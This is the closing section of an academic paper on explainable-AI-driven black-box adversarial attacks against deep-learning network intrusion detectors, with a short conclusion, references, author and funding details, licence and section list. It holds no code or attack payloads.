We had previously proposed XAI-driven white-box adversarial attacks on DL-based NIDS and showed their effectiveness in [34]. In this paper, we improved this method by evolving them from a white-box approach to a black-box approach. Subsequently, we implemented our proposed black-box approach and evaluated it across different NIDS models to confirm its generalizability. As a result, our proposed method achieved a high evasion rate (minimum: 95.7%, maximum: 100%) without requiring internal information about the targeted NIDS and regardless of NIDS models and attack scenarios. Based on these results, we conclude that our proposed method can generate highly evasive and practical AEs, contributing to the assessment and advancement of DL-based NIDS.

References

Apruzzese, G., Colajanni, M., Marchetti, M.: Evaluating the effectiveness of adversarial attacks against botnet detectors. In A. Gkoulalas-Divanis, M. Marchetti, and D. R. Avresky, editors, 18th IEEE International Symposium on Network Computing and Applications, NCA 2019, Cambridge, MA, USA, September 26-28, 2019, pages 1–8. IEEE, (2019)
Bhosale, D.A., Mane, V.M.: Comparative study and analysis of network intrusion detection tools. In 2015 International Conference on Applied and Theoretical Computing and Communication Technology (iCATccT), pages 312–315, (2015)
Biggio, B., Roli, F.: Wild patterns: ten years after the rise of adversarial machine learning. Patt. Recognit. 84, 317–331 (2018)
MATH Google Scholar
Bu, L., Zhao, Z., Duan, Y., Song, F.: Taking care of the discretization problem: a comprehensive study of the discretization problem and a black-box adversarial attack in discrete integer domain. IEEE Trans. Depend. Secur. Comput. 19(5), 3200–3217 (2022)
MATH Google Scholar
Buczak, A.L., Guven, E.: A survey of data mining and machine learning methods for cyber security intrusion detection. IEEE Commun. Surv. Tutorials 18(2), 1153–1176 (2016)
MATH Google Scholar
Clements, J., Yang, Y., Sharma, A.A., Hu, H., Lao, Y.: Rallying adversarial techniques against deep learning for network security. In IEEE Symposium Series on Computational Intelligence, SSCI 2021, Orlando, FL, USA, December 5-7, 2021, pages 1–8. IEEE, (2021)
D’hooge, L., Verkerken, M., Volckaert, B., Wauters, T., Turck, F.D.: Establishing the contaminating effect of metadata feature inclusion in machine-learned network intrusion detection models. In L. Cavallaro, D. Gruss, G. Pellegrino, and G. Giacinto, editors, Detection of Intrusions and Malware, and Vulnerability Assessment - 19th International Conference, DIMVA 2022, Cagliari, Italy, June 29 - July 1, 2022, Proceedings, volume 13358 of Lecture Notes in Computer Science, pages 23–41. Springer, (2022)
Diro, A.A., Chilamkurti, N.K.: Leveraging LSTM networks for attack detection in fog-to-things communications. IEEE Commun. Mag. 56(9), 124–130 (2018)
MATH Google Scholar
Fel, T., Hervier, L., Vigouroux, D., Poche, A., Plakoo, J., Cadene, R., Chalvidal, M., Colin, J., Boissin, T., Bethune, L., Picard, A., Nicodeme, C., Gardes, L., Flandin, G., Serre, T.: Xplique: A deep learning explainability toolbox. Workshop on Explainable Artificial Intelligence for Computer Vision (CVPR) (2022)
Gopinath, M., Sethuraman, S.C.: A comprehensive survey on deep learning based malware detection techniques. Comput. Sci. Rev. 47, 100529 (2023)
MATH Google Scholar
Guo, C., Gardner, J.R., You, Y., Wilson, A.G., Weinberger, K.Q.: Simple black-box adversarial attacks. In K. Chaudhuri and R. Salakhutdinov, editors, Proceedings of the 36th International Conference on Machine Learning, ICML 2019, 9-15 June 2019, Long Beach, California, USA, volume 97 of Proceedings of Machine Learning Research, pages 2484–2493. PMLR, (2019)
Han, D., Wang, Z., Zhong, Y., Chen, W., Yang, J., Lu, S., Shi, X., Yin, X.: Evaluating and improving adversarial robustness of machine learning-based network intrusion detectors. IEEE J. Sel. Areas Commun. 39(8), 2632–2647 (2021)
MATH Google Scholar
Hashemi, M.J., Cusack, G., Keller, E.: Towards evaluation of nidss in adversarial setting. In Proceedings of the 3rd ACM CoNEXT Workshop on Big DAta, Machine Learning and Artificial Intelligence for Data Communication Networks, Big-DAMA@CoNEXT 2019, Orlando, FL, USA, December 9, 2019, pages 14–21. ACM, (2019)
Hassan, M.M., Hassan, M.R., Huda, M.S., de Albuquerque, V.H.C.: A robust deep-learning-enabled trust-boundary protection for adversarial industrial iot environment. IEEE Int. Things J. 8(12), 9611–9621 (2021)
MATH Google Scholar
Homoliak, I., Teknos, M., Ochoa, M., Breitenbacher, D., Hosseini, S., Hanácek, P.: Improving network intrusion detection classifiers by non-payload-based exploit-independent obfuscations: an adversarial approach. EAI Endorsed Trans. Sec. Safety 5(17), e4 (2019)
Google Scholar
Illy, P., Kaddoum, G., de Araujo-Filho, P.F., Kaur, K., Garg, S.: A hybrid multistage dnn-based collaborative IDPS for high-risk smart factory networks. IEEE Trans. Netw. Serv. Manag. 19(4), 4273–4283 (2022)
Google Scholar
Javaid, A.Y., Niyaz, Q., Sun, W., Alam, M.: A deep learning approach for network intrusion detection system. EAI Endorsed Trans. Security Safety 3(9), e2 (2016)
MATH Google Scholar
Karmakar, G.C., Chowdhury, A., Das, R., Kamruzzaman, J., Islam, S.M.: Assessing trust level of a driverless car using deep learning. IEEE Trans. Intell. Transp. Syst. 22(7), 4457–4466 (2021)
MATH Google Scholar
Khraisat, A., Gondal, I., Vamplew, P., Kamruzzaman, J.: Survey of intrusion detection systems: techniques, datasets and challenges. Cybersecur. 2(1), 20 (2019)
Google Scholar
Kumagai, R., Takemoto, S., Nozaki, Y., Yoshikawa, M.: Explainable AI based adversarial examples and its evaluation. In Proceedings of the 6th International Conference on Electronics, Communications and Control Engineering, ICECC 2023, Fukuoka, Japan, March 24-26, 2023, pages 220–225. ACM, (2023)
Kuppa, A., Le-Khac, N.: Adversarial XAI methods in cybersecurity. IEEE Trans. Inf. Forensics Secur. 16, 4924–4938 (2021)
MATH Google Scholar
Kwon, D., Kim, H., Kim, J., Suh, S.C., Kim, I., Kim, K.J.: A survey of deep learning-based network anomaly detection. Clust. Comput. 22(Suppl 1), 949–961 (2019)
MATH Google Scholar
Lampe, B., Meng, W.: A survey of deep learning-based intrusion detection in automotive applications. Expert Syst. Appl. 221, 119771 (2023)
Google Scholar
Li, C., Guo, W., Sun, S.C., Al-Rubaye, S., Tsourdos, A.: Trustworthy deep learning in 6g-enabled mass autonomy: from concept to quality-of-trust key performance indicators. IEEE Veh. Technol. Mag. 15(4), 112–121 (2020)
Google Scholar
Li, D., Deng, L., Lee, M., Wang, H.: Iot data feature extraction and intrusion detection system for smart cities based on deep migration learning. Int. J. Inf. Manag. 49, 533–545 (2019)
MATH Google Scholar
Lin, Z., Shi, Y., Xue, Z.: IDSGAN: generative adversarial networks for attack generation against intrusion detection. In J. Gama, T. Li, Y. Yu, E. Chen, Y. Zheng, and F. Teng, editors, Advances in Knowledge Discovery and Data Mining - 26th Pacific-Asia Conference, PAKDD 2022, Chengdu, China, May 16-19, 2022, Proceedings, Part III, volume 13282 of Lecture Notes in Computer Science, pages 79–91. Springer, (2022)
Lundberg, S.M., Lee, S.: A unified approach to interpreting model predictions. In I. Guyon, U. von Luxburg, S. Bengio, H. M. Wallach, R. Fergus, S. V. N. Vishwanathan, and R. Garnett, editors, Advances in Neural Information Processing Systems 30: Annual Conference on Neural Information Processing Systems 2017, December 4-9, 2017, Long Beach, CA, USA, pages 4765–4774, (2017)
Mahmood, K., Mahmood, R., Rathbun, E., van Dijk, M.: Back in black: a comparative evaluation of recent state-of-the-art black-box attacks. IEEE Access 10, 998–1019 (2022)
MATH Google Scholar
Merzouk, M.A., Cuppens, F., Boulahia-Cuppens, N., Yaich, R.: A deeper analysis of adversarial examples in intrusion detection. In J. García-Alfaro, J. Leneutre, N. Cuppens, and R. Yaich, editors, Risks and Security of Internet and Systems - 15th International Conference, CRiSIS 2020, Paris, France, November 4-6, 2020, Revised Selected Papers, volume 12528 of Lecture Notes in Computer Science, pages 67–84. Springer, (2020)
Merzouk, M.A., Cuppens, F., Boulahia-Cuppens, N., Yaich, R.: Investigating the practicality of adversarial evasion attacks on network intrusion detection. Ann. Des Télé Commun. 77(11–12), 763–775 (2022)
MATH Google Scholar
Minaee, S., Boykov, Y., Porikli, F., Plaza, A., Kehtarnavaz, N., Terzopoulos, D.: Image segmentation using deep learning: A survey. IEEE Trans. Pattern Anal. Mach. Intell. 44(7), 3523–3542 (2022)
Google Scholar
Mirsky, Y., Doitshman, T., Elovici, Y., Shabtai, A.: Kitsune: An ensemble of autoencoders for online network intrusion detection. In 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, (2018)
Mishra, P., Varadharajan, V., Tupakula, U.K., Pilli, E.S.: A detailed investigation and analysis of using machine learning techniques for intrusion detection. IEEE Commun. Surv. Tutorials 21(1), 686–728 (2019)
MATH Google Scholar
Okada, S., Jmila, H., Akashi, K., Mitsunaga, T., Sekiya, Y., Takase, H., Blanc, G., Nakamura, H.: Xai-driven adversarial attacks on network intrusion detectors. In S. Li, K. P. L. Coopamootoo, and M. Sirivianos, editors, European Interdisciplinary Cybersecurity Conference, EICC 2024, Xanthi, Greece, June 5-6, 2024, pages 65–73. ACM, (2024)
Peng, X., Huang, W., Shi, Z.: Adversarial attack against dos intrusion detection: An improved boundary-based method. In 31st IEEE International Conference on Tools with Artificial Intelligence, ICTAI 2019, Portland, OR, USA, November 4-6, 2019, pages 1288–1295. IEEE, (2019)
Pierazzi, F., Pendlebury, F., Cortellazzi, J., Cavallaro, L.: Intriguing properties of adversarial ML attacks in the problem space. In 2020 IEEE Symposium on Security and Privacy, SP 2020, San Francisco, CA, USA, May 18-21, 2020, pages 1332–1349. IEEE, (2020)
Piplai, A., Chukkapalli, S.S.L., Joshi, A.: Nattack! adversarial attacks to bypass a GAN based classifier trained to detect network intrusion. In 6th IEEE International Conference on Big Data Security on Cloud, IEEE International Conference on High Performance and Smart Computing, and IEEE International Conference on Intelligent Data and Security, BigDataSecurity/HPSC/IDS 2020, Baltimore, MD, USA, May 25-27, 2020, pages 49–54. IEEE, (2020)
Potok, T.E., Schuman, C.D., Young, S.R., Patton, R.M., Spedalieri, F.M., Liu, J., Yao, K., Rose, G.S., Chakma, G.: A study of complex deep learning networks on high-performance, neuromorphic, and quantum computers. ACM J. Emerg. Technol. Comput. Syst. 14(2):19:1–19:21, (2018)
Research, P.: Cross-site scripting (xss) cheat sheet
Rudin, C.: Stop explaining black box machine learning models for high stakes decisions and use interpretable models instead. Nat. Mach. Intell. 1(5), 206–215 (2019)
MATH Google Scholar
Sharafaldin, I., Lashkari, A.H., Ghorbani, A.A.: Toward generating a new intrusion detection dataset and intrusion traffic characterization. In P. Mori, S. Furnell, and O. Camp, editors, Proceedings of the 4th International Conference on Information Systems Security and Privacy, ICISSP 2018, Funchal, Madeira - Portugal, January 22-24, 2018, pages 108–116. SciTePress, (2018)
Sowah, R.A., Ofori-Amanfo, K.B., Mills, G.A., Koumadi, K.M.: Detection and prevention of man-in-the-middle spoofing attacks in manets using predictive techniques in artificial neural networks (ANN). J. Comput. Networks Commun. 2019:4683982:1–4683982:14, (2019)
Stinson, E., Mitchell, J.C.: Towards systematic evaluation of the evadability of bot/botnet detection methods. In D. Boneh, T. Garfinkel, and D. Song, editors, 2nd USENIX Workshop on Offensive Technologies, WOOT’08, San Jose, CA, USA, July 28, 2008, Proceedings. USENIX Association, (2008)
Sun, X., Meng, W., Chiu, W., Lampe, B.: TDL-IDS: towards A transfer deep learning based intrusion detection system. In IEEE Global Communications Conference, GLOBECOM 2022, Rio de Janeiro, Brazil, December 4-8, 2022, pages 2603–2608. IEEE, (2022)
Sundararajan, M., Taly, A., Yan, Q.: Axiomatic attribution for deep networks. In D. Precup and Y. W. Teh, editors, Proceedings of the 34th International Conference on Machine Learning, ICML 2017, Sydney, NSW, Australia, 6-11 August 2017, volume 70 of Proceedings of Machine Learning Research, pages 3319–3328. PMLR, (2017)
Szegedy, C., Zaremba, W., Sutskever, I., Bruna, J., Erhan, D., Goodfellow, I.J., Fergus, R.: Intriguing properties of neural networks. In: Y. Bengio and Y. LeCun, editors, 2nd International Conference on Learning Representations, ICLR 2014, Banff, AB, Canada, April 14-16, 2014, Conference Track Proceedings, (2014)
Tang, T.A., Mhamdi, L., McLernon, D.C., Zaidi, S.A.R., Ghogho, M.: Deep learning approach for network intrusion detection in software defined networking. In 2016 International Conference on Wireless Networks and Mobile Communications, WINCOM 2016, Fez, Morocco, October 26-29, 2016, pages 258–263. IEEE, (2016)
Thakkar, A., Lohiya, R.: A review on machine learning and deep learning perspectives of ids for iot: recent updates, security issues, and challenges. Arch. Computat. Methods Eng. 28(4), 3211–3243 (2021)
MATH Google Scholar
Vinayakumar, R., Alazab, M., Soman, K.P., Poornachandran, P., Al-Nemrat, A., Venkatraman, S.: Deep learning approach for intelligent intrusion detection system. IEEE Access 7, 41525–41550 (2019)
Wang, Z.: Deep learning-based intrusion detection with adversaries. IEEE Access 6, 38367–38384 (2018)
Google Scholar
Yahalom, R., Steren, A., Nameri, Y., Roytman, M., Porgador, A., Elovici, Y.: Improving the effectiveness of intrusion detection systems for hierarchical data. Knowl. Based Syst. 168, 59–69 (2019)
Google Scholar
Zhang, J., Ling, Y., Fu, X., Yang, X., Xiong, G., Zhang, R.: Model of the intrusion detection system based on the integration of spatial-temporal features. Comput. Secur. 89, 124 (2020)
MATH Google Scholar

Download references

Acknowledgements

This work was supported by JSPS KAKENHI Grant Number JP23K28051. This work was partly supported by the National Research Agency (ANR) through the GRIFIN project (ANR-20-CE39-0011).

Funding

Open Access funding provided by The University of Tokyo.

Author information

Authors and Affiliations

The University of Tokyo, Tokyo, Japan
Satoshi Okada, Kunio Akashi, Yuji Sekiya, Hideki Takase & Hiroshi Nakamura
Université Paris-Saclay, CEA, List, Orsay, France
Houda Jmila
INIAD, Toyo University, Tokyo, Japan
Takuho Mitsunaga
SAMOVAR, Telecom SudParis, Institut Polytechnique de Paris, Palaiseau, France
Gregory Blanc

Authors

Satoshi Okada
View author publications
You can also search for this author inPubMed Google Scholar
Houda Jmila
View author publications
You can also search for this author inPubMed Google Scholar
Kunio Akashi
View author publications
You can also search for this author inPubMed Google Scholar
Takuho Mitsunaga
View author publications
You can also search for this author inPubMed Google Scholar
Yuji Sekiya
View author publications
You can also search for this author inPubMed Google Scholar
Hideki Takase
View author publications
You can also search for this author inPubMed Google Scholar
Gregory Blanc
View author publications
You can also search for this author inPubMed Google Scholar
Hiroshi Nakamura
View author publications
You can also search for this author inPubMed Google Scholar

Corresponding author

Correspondence to Satoshi Okada.

Ethics declarations

Conflict of interest:

The authors declare that they do not have Conflict of interest.

Ethical approval:

This article does not contain any studies with human participants or animals performed by any of the authors.

Additional information

Publisher's Note

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

The preliminary version of this work [34] appeared in the International Conference on European Interdisciplinary Cybersecurity Conference (EICC) 2024. This paper extends the preliminary work [34] in the following points. First, a black-box adversarial attack is newly proposed. Second, the general effectiveness of the proposed method is proved by using multiple NIDS models (Sect. 5).

Rights and permissions

Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/.

Reprints and permissions

About this article

Cite this article

Okada, S., Jmila, H., Akashi, K. et al. Xai-driven black-box adversarial attacks on network intrusion detectors. Int. J. Inf. Secur. 24, 103 (2025). https://doi.org/10.1007/s10207-025-01016-0

Download citation

Published: 26 March 2025
DOI: https://doi.org/10.1007/s10207-025-01016-0

Xai-driven black-box adversarial attacks on network intrusion detectors

Abstract

Similar content being viewed by others

Adversarial Attacks on Network Intrusion Detection Systems Based on Federated Learning

ZeekFlow: Deep Learning-Based Network Intrusion Detection a Multimodal Approach

State of the Art Literature Review on Network Anomaly Detection with Deep Learning

Explore related subjects

1 Introduction

1.1 Contribution

1.2 Organization of the Paper

2 Background

2.1 DL-based NIDS

2.2 Adversarial Examples

2.3 Explainable Artificial Intelligence

3 Related Research

3.1 DL-based IDS/NIDS

3.2 Adversarial Attacks against DL-based NIDS

4 XAI-driven White-box Attacks on NIDS

4.1 Targeted NIDS and Threat Model

4.2 Details of the attack method

4.3 Evaluation

5 Our Proposal: XAI-driven Black-box Attacks on NIDS

5.1 Limitations of the Previous Work

5.2 Details of Our Proposals

5.3 Flow of XAI-driven Black-box Attacks on NIDS

6 Experimental Results and Discussion

6.1 Environment Settings

6.2 Targeted NIDS Model

6.3 Experiment 1: Brute Force Attack

6.3.1 Evaluation on the CIC-IDS2017 Dataset-Based Model

6.3.2 Evaluation on TON_IoT Dataset-Based Model

6.4 Experiment 2: XSS

6.4.1 Evaluation on the CIC-IDS2017 Dataset-Based Model

6.4.2 Evaluation on TON_IoT Dataset-Based Model

6.5 Discussion

7 Conclusion

References

Acknowledgements

Funding

Author information

Authors and Affiliations

Corresponding author

Ethics declarations

Conflict of interest:

Ethical approval:

Additional information

Publisher's Note

Rights and permissions

About this article

Cite this article

Share this article